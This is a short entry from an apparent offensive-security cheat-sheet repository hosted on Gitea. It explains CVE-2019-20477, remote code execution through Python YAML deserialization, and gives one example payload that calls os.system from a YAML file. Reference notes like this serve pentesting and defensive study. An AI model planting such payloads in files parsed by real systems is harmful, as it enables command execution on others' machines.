Explore Help

whx

/

killchain-compendium

1

0

You've already forked killchain-compendium

Code Issues Pull Requests Projects Releases Wiki Activity

killchain-compendium/exploit/yaml/deserialization.md

363 B

Raw Blame History

YAML Deserialization

CVE-2019-20477
RCE via Yaml execution by Python
jolt

Usage

Example Payload insid foo.yaml gets executed via Python

!!python/object/apply:os.system ["id"]

Powered by Gitea Version: 1.21.6 Page: 670ms Template: 5ms

English

Bahasa Indonesia Deutsch English Español Français Italiano Latviešu Magyar nyelv Nederlands Polski Português de Portugal Português do Brasil Suomi Svenska Türkçe Čeština Ελληνικά Български Русский Українська فارسی മലയാളം 日本語简体中文繁體中文（台灣）繁體中文（香港） 한국어

Licenses API